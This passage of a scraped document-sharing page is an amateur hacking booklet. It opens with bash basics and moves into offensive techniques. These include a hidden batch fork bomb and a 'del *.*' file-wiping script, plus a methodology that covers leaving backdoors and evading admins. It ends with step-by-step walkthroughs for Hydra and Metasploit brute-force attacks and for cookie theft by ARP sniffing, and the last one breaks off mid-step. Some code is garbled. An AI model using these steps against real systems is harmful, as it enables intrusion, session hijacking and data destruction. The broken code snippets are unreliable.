Академический Документы
Профессиональный Документы
Культура Документы
Booklet
Ksh: Korn Shell, can do some nice programming features like floating point math
Bash: Boune again shell, a text based shell like the unix system
Zsh: Z shell, It is considered to be the most feature rich shell with enhanced command completion
and the ability to implement modules which are used to add features like networking &
programming
Identifying Shell
Type in:
ps -p $$
And the output will be:
PID TTY TIME CMD
7410 pts/1 00:00:00 bash
PID: The ID of all the processes
Hello World
Open up a new file in kate (textedit for Ubuntu) and write the following:
#!/bin/bash
echo “helloworld”
To save the file go:
Then choose where you want to save it. For the purposes of this tutorial, save it as “helloworld”
Before using it we need to change it into an executable, to do this type into bash:
chmod u+x helloworld
while you are in the directory with the file. To run the program type ./helloworld into bash. The
./ command tells the computer that the file will be run from the current directory, not from
anywhere else.
#! Is known as the shebang and indicates the interpreter for the script
Local variables: Only exists in the current shell and will go away once we exit the shell
Functions: Takes code which may be repeated, and allows us to call them as often as we like
Arguments
They allow users to input values into their scripts. For instance, when the script:
#!/bin/bash
MESSAGE= “Wake up, ” $1
echo $MESSAGE
and is saved as the program called wake. When it is executed with the command
./wake friend
The output would be:
Wake up, friend
The $ is where the script accepts arguments and you can add arguments after implementing the
initial command.
Argument Behaviour
$0 Name of script
$1 1st argument
$2 2nd argument
$9 9th argument
$# N.o. arguments we have
If statements
Conditional statements changes how a script acts depending on the input. For example:
If [“$1” = “Neo…”]; then
MESSAGE = “Wake up” $1
else
MESSAGE= “Hey, you’re not Neo”
fi
echo $MESSAGE
Wget
Wget may not already be installed on Kali linux, thus, to download this command type:
sudo apt-get install wget
Wget downloads the targeted file from the internet. The syntax is:
wget [options] [URL]
Computer Destruction
Fork Bombs
A fork bomb is a program which fills up the RAM which causes the system to crash. For a simple fork
bomb the code is:
%01%0
This is short for:
:s
start %0
goto s
The first line sets a check point at the beginning of program. Then the %0 retrieves the name of
the .bat file and then the goto s send the program back to the checkpoint.
However, you can add @echo off to hide the cmd window from the user.
Memory wipe
This program will keep on deleting files until it deletes a vital file which causes the system to crash.
del *.*
The * before the ‘.’ Means that the program will delete the file no matter the name. The * after the ‘.’
will tell the program to delete the file no matter the type.
Concepts
Rudy (R U Dead Yet?)
This attack tool generates a slow rate and volume of traffic to avoid anti-DoS tools. This is done by
making the server open to a post request and rather than sending a sing packet, it will send a series
of bytes to the web server. After a few thousand requests, it will stop the web server from working
altogether.
GNOME
GNU Object Model Environment
It is comprised of mostly open source and free tools. It also uses fewer resources than KDE (K
Desktop Environment) however KDE has better customization.
Rootkits
It is a set of programs which can give a user admin privileges
Bootkit: It is a rootkit which uses the start-up code to initiate its attack
Payload: The section of a computer virus which executes malicious activity. For instance, data
destruction, offensive messages, etc.
IRC (Internet relay chat)
It is a pure text chat service. One of the more important ones is the Computer Hope Chat Room
where users asks questions live.
Sample commands:
Commands Use
\away Informs everyone you are AFK
\dcc chat [username]
\ignore [on/off]
\nick [username] Changes username
\help
Hacking Methodology
This is a simple guide for hacking.
Reconnaissance
Do this before the hack and find out about:
Computers
Servers
Printers
OS
Wireless networks
IT admins
Etc.
Passive: Information gather without touching the target (Basically do not send any packets to the
target)
Active:
Gain Access
After recon, you can figure out the vulnerabilities on the network. You can use:
The goal is to get shell access onto a system so you can execute commands
Escalate privileges
Get to root level on the system. Things you can use are:
Metasploit
Exploits
Social engineering
Leave a backdoor
In case you need to access the system again you ned to leave a way in without having to constantly
exploit the system. Sample tools which you can use are:
Netcat
Meterpreter (metasploit)
VNC
Data extraction
Acquire desired data. Note admins can see what files you have accessed, so you could try using a tool
like cryptocat.
Host details: Select host and then you can obtain details about the host
Scans: A log of all the previous scans you have run
Command: How this command would look like in Nmap
Topology: A map of the scanned network with all the hosts connected to said network
Sample use
Step 1
Type in target field:
192.168.1.*
(Sample ip) to scan the network and use the regular scan type command to save time.
Step 2
You also need to check the gateway to ensure you do not mix it up with a host by typing
route -n
in bash
Step 3
Do the same as step one but with intense scan on your target OS
Hydra
Fun idea: Maybe try brute forcing ftp or ssh services instead of the old-fashioned http services.
GUI version: hydra-gtk
Sample command
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra: You need to state the program needed to be used (general bash)
-l means login, if it is a lowercase L, then it will take the next argument (user) as the username.
However, if -L were in uppercase, it will expect a file path to a wordlist (then performs a dictionary
attack to find the username) to find the username
Step 2
Scan target with:
nmap 192.168.227.130
Only if the above ip address your target. Also the telnet port needs to be open
Step 3
Open the metasploit console using:
msfconsole
Step 4
Then look for telnet exploits using:
search telnet
Step 5
Then type:
use auxiliary/scanner/telnet/telnet_login
Step 6
Then look at options
show options
Step 7
Then apply the following settings
set USER_AS_PASS true
set BLANK-PASSWORDS true
set rhosts 192.168.227.130
set USERPASS_FILE /root/desktop/test.txt
Note that you will need a dictionary file in USERPASS_FILE for this exploit to work
Step 8
Install putty using:
apt-get install putty
Then user putty to connect
Cookie stealing
Step 1
Open terminal then open Ettercap using:
ettercap -G
Step 2
Go to
sniff> unified sniffing
And then go and select primary network interface for your computer(eth0 or WLAN)
Step 3
Go to
hosts> Host lists
Then go to
Hosts>Scan for hosts
Step 5
Go to
start>start sniffing
Step 6
Open wireshark.
Then select network interface and then start a wireshark scan
Step 7
Set your wireshark filter as
http.cookie
because we are looking for cookies. Then we should wait for a bit for the target to generate the
cookie.
Step 8
When the cookie is generated, right-click, select:
cookie packet>copy>Bytes> Printable text only
This just copies the cookie onto our clipboard.
Step 9
Go to the target website then set the cookie to: